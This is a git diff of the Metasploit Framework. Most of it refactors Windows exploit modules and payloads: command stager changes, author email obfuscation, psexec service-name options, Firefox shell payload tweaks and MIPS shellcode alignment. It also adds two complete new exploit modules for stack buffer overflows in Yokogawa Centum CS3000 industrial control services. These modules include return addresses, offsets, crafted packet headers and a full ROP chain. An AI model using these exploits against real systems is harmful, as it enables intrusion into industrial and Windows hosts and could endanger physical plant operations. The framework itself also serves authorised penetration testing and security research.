@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::MSSQL_SQLI
-  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -83,6 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           [ 'Automatic', { } ],
         ],
+      'CmdStagerFlavor' => 'vbs',
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'May 30 2000'
       ))
diff --git a/modules/exploits/windows/mysql/mysql_payload.rb b/modules/exploits/windows/mysql/mysql_payload.rb
index 6a03777b27..a903edde07 100644
--- a/modules/exploits/windows/mysql/mysql_payload.rb
+++ b/modules/exploits/windows/mysql/mysql_payload.rb
@@ -9,43 +9,44 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::MYSQL
-  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(
       update_info(
         info,
-      'Name'           => 'Oracle MySQL for Microsoft Windows Payload Execution',
-      'Description'    => %q{
-        This module creates and enables a custom UDF (user defined function) on the
-        target host via the SELECT ... into DUMPFILE method of binary injection. On
-        default Microsoft Windows installations of MySQL (=< 5.5.9), directory write
-        permissions not enforced, and the MySQL service runs as LocalSystem.
+        'Name'           => 'Oracle MySQL for Microsoft Windows Payload Execution',
+        'Description'    => %q{
+          This module creates and enables a custom UDF (user defined function) on the
+          target host via the SELECT ... into DUMPFILE method of binary injection. On
+          default Microsoft Windows installations of MySQL (=< 5.5.9), directory write
+          permissions not enforced, and the MySQL service runs as LocalSystem.
 
-        NOTE: This module will leave a payload executable on the target system when the
-        attack is finished, as well as the UDF DLL, and will define or redefine sys_eval()
-        and sys_exec() functions.
-      },
-    'Author'         =>
-    [
-      'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
-      'todb' # this Metasploit module
-    ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-    [
-      # Bernardo's work with cmd exec via udf
-      [ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ],
-      # Advice from 2005 on securing MySQL on Windows, kind of helpful.
-      [ 'URL', 'http://dev.mysql.com/tech-resources/articles/securing_mysql_windows.html' ]
-    ],
-      'Platform'       => 'win',
-      'Targets'        =>
-    [
-      [ 'Automatic', { } ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
-    ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post.
+          NOTE: This module will leave a payload executable on the target system when the
+          attack is finished, as well as the UDF DLL, and will define or redefine sys_eval()
+          and sys_exec() functions.
+        },
+        'Author'         =>
+          [
+            'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
+            'todb' # this Metasploit module
+          ],
+        'License'        => MSF_LICENSE,
+        'References'     =>
+          [
+            # Bernardo's work with cmd exec via udf
+            [ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ],
+            # Advice from 2005 on securing MySQL on Windows, kind of helpful.
+            [ 'URL', 'http://dev.mysql.com/tech-resources/articles/securing_mysql_windows.html' ]
+          ],
+        'Platform'       => 'win',
+        'Targets'        =>
+          [
+            [ 'Automatic', { } ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
+          ],
+        'CmdStagerFlavor' => 'vbs',
+        'DefaultTarget'  => 0,
+        'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post.
     ))
     register_options(
       [
diff --git a/modules/exploits/windows/oracle/extjob.rb b/modules/exploits/windows/oracle/extjob.rb
index d3d7ad12e5..31f2508060 100644
--- a/modules/exploits/windows/oracle/extjob.rb
+++ b/modules/exploits/windows/oracle/extjob.rb
@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::SMB
-  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -40,6 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
       # This module has been tested on Oracle 10g Release 1
       # where the Oracle Job Scheduler runs as SYSTEM on Windows
       'Targets'        => [['Automatic',{}]],
+      'CmdStagerFlavor' => 'vbs',
       'Privileged'     => true,
       'DisclosureDate' => 'Jan 01 2007',
       'DefaultTarget'  => 0))
diff --git a/modules/exploits/windows/scada/abb_wserver_exec.rb b/modules/exploits/windows/scada/abb_wserver_exec.rb
index af8ddc5df0..e51cb583b6 100644
--- a/modules/exploits/windows/scada/abb_wserver_exec.rb
+++ b/modules/exploits/windows/scada/abb_wserver_exec.rb
@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::Tcp
-  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -45,6 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           [ 'ABB MicroSCADA Pro SYS600 9.3', { } ]
         ],
+      'CmdStagerFlavor' => 'vbs',
       'DefaultTarget'  => 0,
       'Privileged'     => false,
       'DisclosureDate' => 'Apr 05 2013'
diff --git a/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb b/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb
index 678dcb23e9..410eecec0d 100644
--- a/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb
+++ b/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb
@@ -26,7 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'References'     =>
         [
           [ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ],
-          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ]
+          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ],
+          [ 'CVE', '2014-0784']
         ],
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb b/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb
new file mode 100644
index 0000000000..0fbfa732aa
--- /dev/null
+++ b/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb
@@ -0,0 +1,160 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Yokogawa CS3000 BKESimmgr.exe Buffer Overflow',
+      'Description'    => %q{
+        This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability
+        exists in the BKESimmgr.exe service when handling specially crafted packets, due to an
+        insecure usage of memcpy, using attacker controlled data as the size count. This module
+        has been tested successfully in Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows
+        2003 SP2.
+      },
+      'Author'         =>
+        [
+          'juan vazquez',
+          'Redsadic <julian.vilas[at]gmail.com>'
+        ],
+      'References'     =>
+        [
+          ['CVE', '2014-0782'],
+          ['URL', 'https://community.rapid7.com/community/metasploit/blog/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities'],
+          ['URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf']
+        ],
+      'Payload'        =>
+        {
+          'Space'          => 340,
+          'DisableNops'    => true,
+          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [
+            'Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]',
+            {
+              'Ret'           => 0x61d1274f, # 0x61d1274f # ADD ESP,10 # RETN # libbkebatchepa.dll
+              'Offset'        => 64,
+              'FakeArgument1' => 0x0040E65C, # ptr to .data on BKESimmgr.exe
+              'FakeArgument2' => 0x0040EB90  # ptr to .data on BKESimmgr.exe
+            }
+          ],
+        ],
+      'DisclosureDate' => 'Mar 10 2014',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(34205)
+      ], self.class)
+  end
+
+  def check
+    data = create_pkt(rand_text_alpha(4))
+
+    res = send_pkt(data)
+
+    if res && res.length == 10
+      simmgr_res = parse_response(res)
+
+      if valid_response?(simmgr_res)
+        check_code = Exploit::CheckCode::Appears
+      else
+        check_code = Exploit::CheckCode::Safe
+      end
+    else
+      check_code = Exploit::CheckCode::Safe
+    end
+
+    check_code
+  end
+
+  def exploit
+    bof = rand_text(target['Offset'])
+    bof << [target.ret].pack("V")
+    bof << [target['FakeArgument1']].pack("V")
+    bof << [target['FakeArgument2']].pack("V")
+    bof << rand_text(16)  # padding (corrupted bytes)
+    bof << create_rop_chain
+    bof << payload.encoded
+
+    data = [0x1].pack("N")         # Sub-operation id, <= 0x8 in order to pass the check at sub_4090B0
+    data << [bof.length].pack("n")
+    data << bof
+
+    pkt = create_pkt(data)
+
+    print_status("Trying target #{target.name}, sending #{pkt.length} bytes...")
+    connect
+    sock.put(pkt)
+    disconnect
+  end
+
+  def create_rop_chain
+    # rop chain generated with mona.py - www.corelan.be
+    rop_gadgets =
+      [
+        0x004047ca, # POP ECX # RETN [BKESimmgr.exe]
+        0x610e3024, # ptr to &VirtualAlloc() [IAT libbkfmtvrecinfo.dll]
+        0x61232d60, # MOV EAX,DWORD PTR DS:[ECX] # RETN [LibBKESysVWinList.dll]
+        0x61d19e6a, # XCHG EAX,ESI # RETN [libbkebatchepa.dll]
+        0x619436d3, # POP EBP # RETN [libbkeeda.dll]
+        0x61615424, # & push esp #  ret  [libbkeldc.dll]
+        0x61e56c8e, # POP EBX # RETN [LibBKCCommon.dll]
+        0x00000001, # 0x00000001-> ebx
+        0x61910021, # POP EDX # ADD AL,0 # MOV EAX,6191002A # RETN [libbkeeda.dll]
+        0x00001000, # 0x00001000-> edx
+        0x0040765a, # POP ECX # RETN [BKESimmgr.exe]
+        0x00000040, # 0x00000040-> ecx
+        0x6191aaab, # POP EDI # RETN [libbkeeda.dll]
+        0x61e58e04, # RETN (ROP NOP) [LibBKCCommon.dll]
+        0x00405ffa, # POP EAX # RETN [BKESimmgr.exe]
+        0x90909090, # nop
+        0x619532eb  # PUSHAD # RETN [libbkeeda.dll]
+      ].pack("V*")
+
+    rop_gadgets
+  end
+
+  def create_pkt(data)
+    pkt = [0x01].pack("N")         # Operation Identifier
+    pkt << [data.length].pack("n") # length
+    pkt << data                    # Fake packet
+
+    pkt
+  end
+
+  def send_pkt(data)
+    connect
+    sock.put(data)
+    res = sock.get_once
+    disconnect
+
+    res
+  end
+
+  def parse_response(data)
+    data.unpack("NnN")
+  end
+
+  def valid_response?(data)
+    valid = false
+
+    if data && data[0] == 1 && data[1] == 4 && data[1] == 4 && data[2] == 5
+      valid = true
+    end
+
+    valid
+  end
+
+end
diff --git a/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb b/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb
new file mode 100644
index 0000000000..90a1155783
--- /dev/null
+++ b/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb
@@ -0,0 +1,75 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Udp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow',
+      'Description'    => %q{
+        This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability
+        exists in the service BKFSim_vhfd.exe when using malicious user-controlled data to create
+        logs using functions like vsprintf and memcpy in a insecure way. This module has been
+        tested successfully on Yokogawa Centum CS3000 R3.08.50 over Windows XP SP3.
+      },
+      'Author'         =>
+        [
+          'Redsadic <julian.vilas[at]gmail.com>',
+          'juan vazquez'
+        ],
+      'References'     =>
+        [
+          ['CVE', '2014-3888'],
+          ['URL', 'http://jvn.jp/vu/JVNVU95045914/index.html'],
+          ['URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0002E.pdf'],
+          ['URL', 'https://community.rapid7.com/community/metasploit/blog/2014/07/07/r7-2014-06-disclosure-yokogawa-centum-cs-3000-bkfsimvhfdexe-buffer-overflow']
+        ],
+      'Payload'        =>
+        {
+          'Space'    => 1770, # 2228 (max packet length) - 16 (header) - (438 target['Offset']) - 4 (ret)
+          'DisableNops' => true,
+          'BadChars' => "\x00",
+          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3',
+            {
+              'Ret'    => 0x61e55c9c, # push esp | ret # LibBKCCommon.dll
+              'Offset' => 438
+            }
+          ],
+        ],
+      'DisclosureDate' => 'May 23 2014',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(20010)
+      ], self.class)
+  end
+
+  def exploit
+    connect_udp
+
+    sploit = "\x45\x54\x56\x48\x01\x01\x10\x09\x00\x00\x00\x01\x00\x00\x00\x44" # header
+    sploit << rand_text(target['Offset'])
+    sploit << [target.ret].pack("V")
+    sploit << payload.encoded
+
+    print_status("Trying target #{target.name}, sending #{sploit.length} bytes...")
+    udp_sock.put(sploit)
+
+    disconnect_udp
+  end
+
+end
+
diff --git a/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb b/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb
index fc5144ec3f..cc6166ad9d 100644
--- a/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb
+++ b/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb
@@ -28,7 +28,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'References'     =>
         [
           [ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ],
-          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ]
+          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ],
+          [ 'CVE', '2014-0783']
         ],
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/smb/ms06_025_rras.rb b/modules/exploits/windows/smb/ms06_025_rras.rb
index de5c750616..39d65b37fa 100644
--- a/modules/exploits/windows/smb/ms06_025_rras.rb
+++ b/modules/exploits/windows/smb/ms06_025_rras.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
         When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.			},
       'Author'         =>
         [
-          'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>',
+          'Nicolas Pouvesle <nicolas.pouvesle[at]gmail.com>',
           'hdm'
         ],
       'License'        => MSF_LICENSE,
diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb
index 9c83a3e43b..fdd61ece0c 100644
--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           'hdm', # with tons of input/help/testing from the community
           'Brett Moore <brett.moore[at]insomniasec.com>',
-          'frank2 <frank2@dc949.org>', # check() detection
+          'frank2 <frank2[at]dc949.org>', # check() detection
           'jduck', # XP SP2/SP3 AlwaysOn DEP bypass
         ],
       'License'        => MSF_LICENSE,
diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb
index 68badfeef6..03027e943d 100644
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -81,7 +81,9 @@ class Metasploit3 < Msf::Exploit::Remote
         OptBool.new('MOF_UPLOAD_METHOD', [true, "Use WBEM instead of RPC, ADMIN$ share will be mandatory. ( Not compatible with Vista+ )", false]),
         OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]),
         OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil]),
-        OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
+        OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil]),
+        OptString.new('SERVICE_NAME', [false, "Servicename to to be used on target for the service binary and manager",nil]),
+        OptString.new('SERVICE_DISPLAYNAME', [false, "Service displayname to to be used on target for the service manager",nil])
       ], self.class)
   end
 
@@ -152,8 +154,9 @@ class Metasploit3 < Msf::Exploit::Remote
       # Disconnect from the ADMIN$
       simple.disconnect("ADMIN$")
     else
-      servicename = rand_text_alpha(8)
+      servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)
       servicedescription = datastore['SERVICE_DESCRIPTION']
+      displayname = datastore['SERVICE_DISPLAYNAME'] || 'M' + rand_text_alpha(rand(32)+1)
 
       # Upload the shellcode to a file
       print_status("Uploading payload...")
@@ -199,7 +202,7 @@ class Metasploit3 < Msf::Exploit::Remote
         file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}"
       end
 
-      psexec(file_location, false, servicedescription)
+      psexec(file_location, false, servicedescription, servicename, displayname)
 
       print_status("Deleting \\#{filename}...")
       sleep(1)
diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb
index d768e8b5d2..305855e131 100644
--- a/modules/exploits/windows/winrm/winrm_script_exec.rb
+++ b/modules/exploits/windows/winrm/winrm_script_exec.rb
@@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ManualRanking
 
   include Msf::Exploit::Remote::WinRM
-  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::CmdStager
 
 
   def initialize(info = {})
@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote
           delivery: Powershell 2.0 and VBS CmdStager.
 
           The module will check if Powershell 2.0 is available, and if so uses
-          that method. Otherwise it falls back to the VBS Cmdstager which is
+          that method. Otherwise it falls back to the VBS CmdStager which is
           less stealthy.
 
           IMPORTANT: If targeting an x64 system with the Powershell method
@@ -41,6 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
           'WfsDelay'     => 30,
           'EXITFUNC' => 'thread',
           'InitialAutoRunScript' => 'post/windows/manage/smart_migrate',
+          'CMDSTAGER::DECODER' => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_sleep")
         },
       'Platform'       => 'win',
       'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
@@ -59,12 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
         OptString.new('PASSWORD', [ true, 'A specific password to authenticate with' ]),
       ], self.class
     )
-
-    register_advanced_options(
-    [
-      OptString.new( 'DECODERSTUB',  [ true, 'The VBS base64 file decoder stub to use.',
-        File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_sleep")]),
-    ], self.class)
+    deregister_options('CMDSTAGER::FLAVOR')
     @compat_mode = false
   end
 
@@ -78,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
       return if path.nil?
       exec_script(path)
     else
-      execute_cmdstager
+      execute_cmdstager({:flavor => :vbs})
     end
     handler
   end
diff --git a/modules/payloads/singles/cmd/unix/bind_perl.rb b/modules/payloads/singles/cmd/unix/bind_perl.rb
index 66ae6716de..ffd0535b09 100644
--- a/modules/payloads/singles/cmd/unix/bind_perl.rb
+++ b/modules/payloads/singles/cmd/unix/bind_perl.rb
@@ -17,7 +17,7 @@ module Metasploit3
     super(merge_info(info,
       'Name'          => 'Unix Command Shell, Bind TCP (via Perl)',
       'Description'   => 'Listen for a connection and spawn a command shell via perl',
-      'Author'        => ['Samy <samy@samy.pl>', 'cazz'],
+      'Author'        => ['Samy <samy[at]samy.pl>', 'cazz'],
       'License'       => BSD_LICENSE,
       'Platform'      => 'unix',
       'Arch'          => ARCH_CMD,
diff --git a/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb b/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb
index 290ef86af4..e8121f085a 100644
--- a/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb
+++ b/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb
@@ -17,7 +17,7 @@ module Metasploit3
     super(merge_info(info,
       'Name'          => 'Unix Command Shell, Bind TCP (via perl) IPv6',
       'Description'   => 'Listen for a connection and spawn a command shell via perl',
-      'Author'        => ['Samy <samy@samy.pl>', 'cazz'],
+      'Author'        => ['Samy <samy[at]samy.pl>', 'cazz'],
       'License'       => BSD_LICENSE,
       'Platform'      => 'unix',
       'Arch'          => ARCH_CMD,
diff --git a/modules/payloads/singles/cmd/windows/bind_perl.rb b/modules/payloads/singles/cmd/windows/bind_perl.rb
index 42da08864a..a307b7b9c4 100644
--- a/modules/payloads/singles/cmd/windows/bind_perl.rb
+++ b/modules/payloads/singles/cmd/windows/bind_perl.rb
@@ -17,7 +17,7 @@ module Metasploit3
     super(merge_info(info,
       'Name'          => 'Windows Command Shell, Bind TCP (via Perl)',
       'Description'   => 'Listen for a connection and spawn a command shell via perl (persistent)',
-      'Author'        => ['Samy <samy@samy.pl>', 'cazz', 'patrick'],
+      'Author'        => ['Samy <samy[at]samy.pl>', 'cazz', 'patrick'],
       'License'       => BSD_LICENSE,
       'Platform'      => 'win',
       'Arch'          => ARCH_CMD,
diff --git a/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb b/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb
index 283d965fbb..3866ee4be0 100644
--- a/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb
+++ b/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb
@@ -17,7 +17,7 @@ module Metasploit3
     super(merge_info(info,
       'Name'          => 'Windows Command Shell, Bind TCP (via perl) IPv6',
       'Description'   => 'Listen for a connection and spawn a command shell via perl (persistent)',
-      'Author'        => ['Samy <samy@samy.pl>', 'cazz', 'patrick'],
+      'Author'        => ['Samy <samy[at]samy.pl>', 'cazz', 'patrick'],
       'License'       => BSD_LICENSE,
       'Platform'      => 'win',
       'Arch'          => ARCH_CMD,
diff --git a/modules/payloads/singles/firefox/shell_bind_tcp.rb b/modules/payloads/singles/firefox/shell_bind_tcp.rb
index 9a91867fb7..377c25a624 100644
--- a/modules/payloads/singles/firefox/shell_bind_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_bind_tcp.rb
@@ -6,6 +6,7 @@
 require 'msf/core'
 require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
@@ -23,22 +24,14 @@ module Metasploit3
       'Arch'          => ARCH_FIREFOX,
       'Handler'       => Msf::Handler::BindTcp,
       'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'firefox',
-      'Payload'       => { 'Offsets' => {}, 'Payload' => '' }
+      'PayloadType'   => 'firefox'
     ))
   end
 
-  #
-  # Constructs the payload
-  #
-  def generate
-    super + command_string
-  end
-
   #
   # Returns the JS string to use for execution
   #
-  def command_string
+  def generate
     %Q|
     (function(){
       Components.utils.import("resource://gre/modules/NetUtil.jsm");
@@ -59,16 +52,17 @@ module Metasploit3
         }
       };
 
+      #{read_until_token_source}
+
       var clientListener = function(outStream) {
         return {
           onStartRequest: function(request, context) {},
           onStopRequest: function(request, context) {},
-          onDataAvailable: function(request, context, stream, offset, count) {
-            var data = NetUtil.readInputStreamToString(stream, count).trim();
+          onDataAvailable: readUntilToken(function(data) {
             runCmd(data, function(err, output) {
               if(!err) outStream.write(output, output.length);
             });
-          }
+          })
         };
       };
 
diff --git a/modules/payloads/singles/firefox/shell_reverse_tcp.rb b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
index 92d32aa8c4..e3a8d572fe 100644
--- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
@@ -6,6 +6,7 @@
 require 'msf/core'
 require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
@@ -45,15 +46,16 @@ module Metasploit3
                        .createInstance(Components.interfaces.nsIInputStreamPump);
         pump.init(inStream, -1, -1, 0, 0, true);
 
+        #{read_until_token_source}
+
         var listener = {
           onStartRequest: function(request, context) {},
           onStopRequest: function(request, context) {},
-          onDataAvailable: function(request, context, stream, offset, count) {
-            var data = NetUtil.readInputStreamToString(stream, count).trim();
+          onDataAvailable: readUntilToken(function(data) {
             runCmd(data, function(err, output) {
               if (!err) outStream.write(output, output.length);
             });
-          }
+          })
         };
 
         #{run_cmd_source}
@@ -63,4 +65,5 @@ module Metasploit3
 
     EOS
   end
+
 end
diff --git a/modules/payloads/singles/linux/mipsbe/exec.rb b/modules/payloads/singles/linux/mipsbe/exec.rb
index a4e5dbda29..ed55d8e87e 100644
--- a/modules/payloads/singles/linux/mipsbe/exec.rb
+++ b/modules/payloads/singles/linux/mipsbe/exec.rb
@@ -19,7 +19,7 @@ module Metasploit3
          },
       'Author'        =>
         [
-          'Michael Messner <devnull@s3cur1ty.de>', #metasploit payload
+          'Michael Messner <devnull[at]s3cur1ty.de>', #metasploit payload
           'entropy@phiral.net'  #original payload
         ],
       'References'    =>
@@ -66,7 +66,13 @@ module Metasploit3
     #
     # Constructs the payload
     #
-    return super + shellcode + command_string + "\x00"
+
+    shellcode = shellcode + command_string + "\x00"
+
+    # we need to align our shellcode to 4 bytes
+    (shellcode = shellcode + "\x00") while shellcode.length%4 != 0
+
+    return super + shellcode
 
   end
 
diff --git a/modules/payloads/singles/linux/mipsbe/reboot.rb b/modules/payloads/singles/linux/mipsbe/reboot.rb
index d6e15cb03b..40a7eab46b 100644
--- a/modules/payloads/singles/linux/mipsbe/reboot.rb
+++ b/modules/payloads/singles/linux/mipsbe/reboot.rb
@@ -20,8 +20,8 @@ module Metasploit3
          },
       'Author'        =>
         [
-          'Michael Messner <devnull@s3cur1ty.de>', #metasploit payload
-          'rigan - <imrigan@gmail.com>'  #original payload
+          'Michael Messner <devnull[at]s3cur1ty.de>', #metasploit payload
+          'rigan - <imrigan[at]gmail.com>'  #original payload
         ],
       'References'    =>
         [
diff --git a/modules/payloads/singles/linux/mipsle/exec.rb b/modules/payloads/singles/linux/mipsle/exec.rb
index b71feda883..c9a903edde 100644
--- a/modules/payloads/singles/linux/mipsle/exec.rb
+++ b/modules/payloads/singles/linux/mipsle/exec.rb
@@ -20,7 +20,7 @@ module Metasploit3
          },
       'Author'        =>
         [
-          'Michael Messner <devnull@s3cur1ty.de>', #metasploit payload
+          'Michael Messner <devnull[at]s3cur1ty.de>', #metasploit payload
           'entropy@phiral.net'  #original payload
         ],
       'References'    =>
@@ -62,12 +62,18 @@ module Metasploit3
       "\xec\xff\xa0\xaf" + # sw zero,-20(sp)
       "\xe8\xff\xa5\x27" + # addiu a1,sp,-24
       "\xab\x0f\x02\x24" + # li v0,4011
-      "\x0c\x01\x01\x01"   # + syscall 0x40404
+      "\x0c\x01\x01\x01"   # syscall 0x40404
 
     #
     # Constructs the payload
     #
-    return super + shellcode + command_string + "\x00"
+
+    shellcode = shellcode + command_string + "\x00"
+
+    # we need to align our shellcode to 4 bytes
+    (shellcode = shellcode + "\x00") while shellcode.length%4 != 0
+
+    return super + shellcode
 
   end
 
diff --git a/modules/payloads/singles/linux/mipsle/reboot.rb b/modules/payloads/singles/linux/mipsle/reboot.rb
index 5bc3f12904..eb87522179 100644
--- a/modules/payloads/singles/linux/mipsle/reboot.rb
+++ b/modules/payloads/singles/linux/mipsle/reboot.rb
@@ -19,8 +19,8 @@ module Metasploit3
          },
       'Author'        =>
         [
-          'Michael Messner <devnull@s3cur1ty.de>', #metasploit payload
-          'rigan - <imrigan@gmail.com>'  #original payload
+          'Michael Messner <devnull[at]s3cur1ty.de>', #metasploit payload
+          'rigan - <imrigan[at]gmail.com>'  #original payload
         ],
       'References'    =>
         [
diff --git a/modules/payloads/singles/php/bind_perl.rb b/modules/payloads/singles/php/bind_perl.rb
index b5256c16d9..90d50c26d0 100644
--- a/modules/payloads/singles/php/bind_perl.rb
+++ b/modules/payloads/singles/php/bind_perl.rb
@@ -17,7 +17,7 @@ module Metasploit3
     super(merge_info(info,
       'Name'          => 'PHP Command Shell, Bind TCP (via Perl)',
       'Description'   => 'Listen for a connection and spawn a command shell via perl (persistent)',
-      'Author'        => ['Samy <samy@samy.pl>', 'cazz'],
+      'Author'        => ['Samy <samy[at]samy.pl>', 'cazz'],
       'License'       => BSD_LICENSE,
       'Platform'      => 'php',
       'Arch'          => ARCH_PHP,
diff --git a/modules/payloads/singles/php/bind_perl_ipv6.rb b/modules/payloads/singles/php/bind_perl_ipv6.rb
index f6bca827aa..5495dbe8a9 100644
--- a/modules/payloads/singles/php/bind_perl_ipv6.rb
+++ b/modules/payloads/singles/php/bind_perl_ipv6.rb
@@ -17,7 +17,7 @@ module Metasploit3
     super(merge_info(info,
       'Name'          => 'PHP Command Shell, Bind TCP (via perl) IPv6',
